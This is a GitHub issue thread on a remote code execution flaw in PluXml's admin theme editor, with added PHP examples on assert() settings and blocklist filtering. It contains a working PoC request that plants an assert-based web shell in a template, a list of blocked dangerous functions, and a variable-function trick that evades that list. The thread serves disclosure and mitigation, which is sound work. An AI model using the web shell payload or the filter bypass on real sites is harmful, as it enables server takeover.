An issue in the theme edit function #320

Closed
jadacheng opened this issue Feb 17, 2019 · 7 comments

@jadacheng

The theme edit function /PluXml/core/admin/parametres_edittpl.php allows remote attackers to execute arbitrary PHP code by placing this code into a template.

PoC:
/PluXml/core/admin/parametres_edittpl.php [POST]token=603b37bed4a91d8b18a3507c46ae27df644a2ff4&template=%2Ftags.php&submit=Save+the+file&tpl=%2Ftags.php&content=%3C%3Fphp+assert%28%24_REQUEST%5B%27c%27%5D%29%3B%3F%3E%0D%0A

then visit /PluXml/themes/defaut/tags.php?c=phpinfo();


@haruka-7
Collaborator

Hello,
I confirm this vulnerability. What's your recommendation? Using an XSS filter?
Thanks for help.

@haruka-7 haruka-7 self-assigned this Feb 26, 2019
@haruka-7 haruka-7 added the bug label Feb 26, 2019
@bazooka07
Collaborator

You can disable the assert evaluation in php.ini.
I have Ubuntu Bionic 18.04.2 and your code does not work.
Display phpinfo and look for assert. I have "zend.assertions" equals -1 for local and global values.
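The comment above points at zend.assertions as the reason the PoC fails on a stock Ubuntu 18.04 PHP. The script below is an added example (not PluXml code) that turns that phpinfo check into a decision: given a PHP version and the two ini values that govern assert(), does assert($string) evaluate the string as code? It encodes three facts about the engine: PHP 8.0 removed string evaluation in assert() entirely, PHP 7.x only evaluates when zend.assertions is 1 and assert.active is on, and PHP 5.x has no zend.assertions so assert.active alone decides. The settings table is constructed, and the function names are mine.

```php
<?php
// Added example, not part of PluXml. Decide whether the assert() string-eval
// primitive used in the PoC is live, from the settings that govern it.
// All settings in $cases below are constructed inputs.

/**
 * Return true when assert($string) would evaluate $string as PHP code.
 *
 *  - PHP >= 8.0 never evaluates string assertions (removed in 8.0), so the
 *    PoC payload degrades to a truthiness check.
 *  - On PHP 7.x, assert() is compiled out when zend.assertions = -1 and
 *    compiled but skipped when it is 0; only 1 executes it, and then
 *    assert.active must also be on.
 *  - On PHP 5.x there is no zend.assertions; assert.active alone decides.
 */
function assertStringEvalPossible(int $versionId, ?string $zendAssertions, string $assertActive): bool
{
    if ($versionId >= 80000) {
        return false;
    }
    $active = filter_var($assertActive, FILTER_VALIDATE_BOOLEAN);
    if ($versionId < 70000) {
        return $active;
    }
    return ((int) $zendAssertions) === 1 && $active;
}

/** Same question asked of the interpreter actually running this script. */
function currentEngineExposed(): bool
{
    $zend = ini_get('zend.assertions');
    return assertStringEvalPossible(
        PHP_VERSION_ID,
        $zend === false ? null : $zend,
        (string) ini_get('assert.active')
    );
}

// Constructed settings table: [PHP_VERSION_ID, zend.assertions, assert.active, expected]
$cases = [
    [70210, '-1', '1', false],  // the Ubuntu 18.04 default described above
    [70210, '1',  '1', true],   // development php.ini: the PoC works
    [70210, '1',  '0', false],  // assert_options(ASSERT_ACTIVE, false) / assert.active=0
    [50630, null, '1', true],   // PHP 5: no zend.assertions, assert.active decides
    [80100, '1',  '1', false],  // PHP 8: string assertions are no longer evaluated
];

foreach ($cases as [$ver, $zend, $active, $expected]) {
    $got = assertStringEvalPossible($ver, $zend, $active);
    printf(
        "%d zend.assertions=%s assert.active=%s -> %s%s\n",
        $ver,
        $zend ?? 'n/a',
        $active,
        $got ? 'EXPOSED' : 'safe',
        $got === $expected ? '' : '  (unexpected)'
    );
}
printf("this interpreter (%s): %s\n", PHP_VERSION, currentEngineExposed() ? 'EXPOSED' : 'safe');
```

The check only answers whether this particular payload runs. The editor writes whatever PHP the admin submits, so a "safe" verdict here says nothing about the template-editing feature itself, which is the point jadacheng makes further down the thread.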

@jerrywham
Contributor

assert_options(ASSERT_ACTIVE,false);

at the beginning of the index.php file?

@jerrywham
Contributor

Any news?

@jadacheng
Author

In fact, I think it's not a good idea for the webadmin to be able to edit .php files directly.
Filtering is never enough.
If you really need this feature:
ignore this problem,
or
verify that the webadmin is a system administrator.

@setharnold

Hello, it appears CVE-2020-18184 has been assigned to this issue. However, the documentation seems to include a lot of instructions for how to execute arbitrary code in themes:

PluXml's plugin engine relies on a hook system (« crochets » in French) that allows injecting PHP, HTML and JavaScript code into PluXml's own code.

https://wiki.pluxml.org/developper/developpement/

The examples even make extensive use of eval, which suggests to me that the feature is intended to allow administrators to execute anything they want any time they want.

Is this working as intended?

Thanks

@bazooka07 bazooka07 self-assigned this Dec 13, 2022
@bazooka07
Collaborator

A new function plxUtils::sanitizePhp is added to PluXml.
The value of the content field is checked with this function.
It comments out critical functions in the PHP script, like: fsockopen, proc_open, system, exec, chroot, shell_exec, socket.
See PR#589

Of course, it's better to disable these critical functions in php.ini.
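To show what a "comment out the dangerous calls" filter on the content field can and cannot see, here is an added example. It is not plxUtils::sanitizePhp from PR#589 and does not reproduce it; it is a minimal model of the same idea, run over two constructed template snippets with the function names listed in the comment above. The first snippet calls system() directly and is neutralised; the second reaches the same function through a variable function name, which a token-based filter has no way to match. That is the gap behind jadacheng's "filtering is never enough", and it is why the php.ini route matters: disable_functions removes the function from the engine, so it stops the indirect call too. The helper names are mine.

```php
<?php
// Added example, not PluXml code and not plxUtils::sanitizePhp: a minimal
// model of a blocklist filter that comments out lines with direct calls to
// dangerous functions, plus one input it cannot catch. Inputs are constructed.

/**
 * Comment out every line that directly calls one of $blocklist. This is the
 * kind of check a sanitizer on the template editor's content field can do.
 */
function commentOutDangerousCalls(string $php, array $blocklist): string
{
    // \b<name>\s*( : a bare call site; no other call form is inspected
    $pattern = '/\b(' . implode('|', array_map('preg_quote', $blocklist)) . ')\s*\(/i';
    $out = [];
    foreach (explode("\n", $php) as $line) {
        $out[] = preg_match($pattern, $line) ? '// ' . $line : $line;
    }
    return implode("\n", $out);
}

/** Count the lines the filter changed, for the demonstration below. */
function neutralisedLineCount(string $before, string $after): int
{
    $n = 0;
    foreach (array_map(null, explode("\n", $before), explode("\n", $after)) as [$b, $a]) {
        if ($b !== $a) {
            $n++;
        }
    }
    return $n;
}

// The list as named in the comment above.
$blocklist = ['fsockopen', 'proc_open', 'system', 'exec', 'chroot', 'shell_exec', 'socket'];

// Constructed input 1: the direct call the filter is designed for.
$direct = "<?php\nsystem(\$_GET['c']);\n";

// Constructed input 2: the same call reached through a variable function name.
// No blocklisted token sits next to '(', so the regex has nothing to match,
// yet at runtime $f('...') calls system() all the same. disable_functions in
// php.ini would stop this one as well, because the function no longer exists.
$indirect = "<?php\n\$f = 'sys' . 'tem';\n\$f(\$_GET['c']);\n";

foreach (['direct' => $direct, 'indirect' => $indirect] as $label => $src) {
    $filtered = commentOutDangerousCalls($src, $blocklist);
    printf("%s: %d line(s) commented out\n%s\n", $label, neutralisedLineCount($src, $filtered), $filtered);
}
```

One caveat on the php.ini route: disable_functions only covers real functions. eval is a language construct, so it cannot be listed there; the assert() primitive from the PoC is governed by zend.assertions instead, as discussed earlier in the thread.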
